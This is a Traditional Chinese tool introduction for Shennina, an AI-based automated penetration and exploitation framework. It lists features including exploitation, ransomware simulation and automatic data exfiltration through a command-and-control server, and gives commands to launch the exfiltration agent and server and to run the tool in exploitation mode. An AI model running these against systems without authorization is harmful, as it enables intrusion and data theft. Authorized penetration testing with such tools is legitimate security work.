Shennina 是一款功能強大的自動化主機滲透 / 漏洞利用框架,該專案的主要目的是使用人工智能技術來實現安全掃描、漏洞掃描 / 分析和漏洞利用開發的完全自動化。Shennina 整合了 Metasploit 和 Nmap 這兩款強大的網絡安全工具實現其部分功能,並執行滲透測試。除此之外,該工具還整合了一個命令控制伺服器用於從目標主機中自動過濾數據。
功能介紹
1、實現了自動化自我學習方法來查找漏洞利用方案;
2、使用了托管並發設計實現高性能運行;
3、智能集群滲透測試 / 漏洞利用;
4、後滲透功能;
5、欺騙攻擊檢測;
6、勒索軟體模擬功能;
7、自動數據過濾;
8、可選的漏洞掃描模式;
9、啟發式模式獲取推薦的滲透測試方案;
10、支援 Windows、Linux 和 macOS 代理;
11、後滲透階段腳本化的攻擊 / 滲透模式;
12、提供針對內核的漏洞利用 / 滲透解決方案建議;
13、針對漏洞利用方案提供帶外技術測試;
14、自動過濾目標伺服器中的重要數據;
15、報告生成;
16、覆蓋了 MITRE ATT&CK 框架中的 40+ TTP;
17、支援多個輸入目標;
工具下載#
由於該工具基於 Python 開發,因此我們首先需要在本地設備上安裝並配置好 Python 環境。接下來,我們就可以使用下列命令將該專案原始碼克隆至本地:
git clone https://github.com/mazen160/shennina.git
然後使用 pip 命令和專案提供的 requirements.txt 文件來安裝該工具所需的相依元件:
cd Shennina
pip install requirements.txt
除此之外,我們也可以直接訪問該專案的 Release 頁面來下載工具最新的發布版本。
工具運行#
過濾伺服器 - 代理
Linux/macOS
./exfiltration-server/agent.sh
Windows
./exfiltration-server/agent.ps1
過濾伺服器 - 運行
$ cd ./exfiltration-server/
$ ./run-server.sh
MSFRPCD 伺服器
./scripts/run-msfrp.py
運行服務掃描
$ ./shennina.py --lhost metasploit-ip --target target.local --service-scan-only
以訓練模式運行 Shennina
$ ./shennina.py --training-mode --lhost lhost.local --target training-target.local
滲透測試模式
$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode
滲透測試模式 - 啟發式
$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode --secondary-mode
專案地址#
Shennina:https://github.com/mazen160/shennina